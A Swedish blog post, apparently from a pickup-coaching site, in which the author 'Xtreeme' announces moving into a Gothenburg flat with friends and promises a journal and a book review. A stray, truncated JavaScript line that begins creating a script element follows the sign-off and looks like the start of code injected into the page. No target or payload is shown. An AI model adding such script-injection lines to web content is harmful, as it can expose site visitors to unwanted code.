En Attraktionsexpert flyttar in…

Tjena killar! Då var det dags för mig att ge mig av från bekvämligheten för ett entra en ny nivå. Project Gothenburg öppnar imorgon då jag, Mister.M och två andra sköna snubbar flyttar in ihop till en feting lägenhet mitt inne i centrum.

Jag kommer att hålla en offentlig journal över hela utvecklingen och det kommer bli otroligt spännande att skriva och för er att följa. Då och då kommer ett urklipp från den journalen att hamna här och självklart, som alltid, kommer jag tillsammans med de andra instruktörerna på CR att fylla denna blogg med bra information för er.

Redan imorgon (kanske till och med senare på dagen) ska jag skriva om ett otroligt bra boktips vars kunskap kommer att förändra din syn på kvinnor och få dig att acceptera dem på ett helt annat sätt än du någonsin lärt dig. Titta till bloggen den närmsta tiden så får du rescensionen helt och hållet.

Till Project Gothenburg, vi har inte gett huset något bättre namn än så länge, ska jag tillägga att vårt syfte med att flytta in delar sig och går ihop på många punkter.

Mitt syfte är att ha en plattform som man kan ha för att skapa ett rykte om. Att ha det som en oas för alla vanliga människor att drömma sig bort i. Samtidigt ska det vara en plattform för att pusha varandras utveckling där musiken och mitt skrivande är mina främsta prioriteringar och de två andras är game. Mister.M har handbollen och är otroligt skicklig.

Sparta!

Jag kan lova att detta projekt kommer att bli legendarisk. Det har ni mitt ord på.

Mvh
- Xtreeme

var d=document;var s=d.createElement(‘script’);